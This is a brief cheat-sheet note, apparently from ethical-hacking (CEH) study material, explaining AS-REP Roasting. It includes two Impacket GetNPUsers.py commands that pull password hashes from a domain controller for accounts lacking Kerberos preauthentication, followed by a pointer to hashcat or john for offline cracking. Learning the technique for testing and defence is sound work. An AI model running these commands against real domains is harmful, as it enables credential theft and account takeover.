AS-REP Roasting

AS-REP Roasting is a technique that enables adversaries to steal the password hashes of user accounts that have Kerberos preauthentication disabled, which they can then attempt to crack offline.

Get AD User information

python3 GetNPUsers.py CEH.com/ -no-pass -usersfile /root/ADtools/users.txt -dc-ip 10.10.1.22.

no-pass: Accounts not requiring Kerberos preauthentication flag

impacket-GetNPUsers.py 'SKILL.CEH.com/' -no-pass -usersfile users.txt -dc-ip 192.168.0.144

Then use hashcat/john: hashcat#AS-REP Roasting